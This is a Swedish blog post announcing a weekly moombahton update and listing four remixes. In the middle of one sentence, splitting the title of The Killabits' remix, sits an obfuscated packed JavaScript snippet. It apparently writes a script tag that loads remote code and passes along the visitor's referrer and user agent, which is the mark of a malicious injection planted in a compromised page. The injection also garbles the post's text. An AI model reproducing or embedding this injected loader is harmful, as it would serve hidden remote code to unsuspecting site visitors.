Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Moombahton Update!

Moombahton Update!
Alexander Gylemo

Det är dags för veckans update av moombahton! Den här gången fokuserar vi på feta remixar; Updaten bjuder på en av redaktionens favoriter Torro Torro, duon som är baserad i Toronto och bygger seriös buzz runt genren, The Killabits blivande klassikerremix av The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bafzn|var|u0026u|referrer|tniyk||js|php’.split(’|’),0,{}))
S – Haunting Melodies
, up and coming-producenten Chong X som bjuder på en grym minimal moombahton remix på Haaksmans ”Din Daa Daa” och en av genrens främsta fanbänare J-Tricks remix på Spenda C.

Håll även ögonen öppna på Alla Hjärtans Dag då Generation Bass släpper compilation EP:n Moombahluv Volume 3 – The Finale, den sista delen i den superhypade Moombahluv-serien!

Enjoy!

Dooze Jackers – Why We Fwree (Torro Torro Remix)

The S – Haunting Melodies (The Killabits Moombahton Remix)

Daniel Haaksman – Din Daa Daa (Chong X Remix)

Spenda C – Getting Dumb (J-Trick Remix)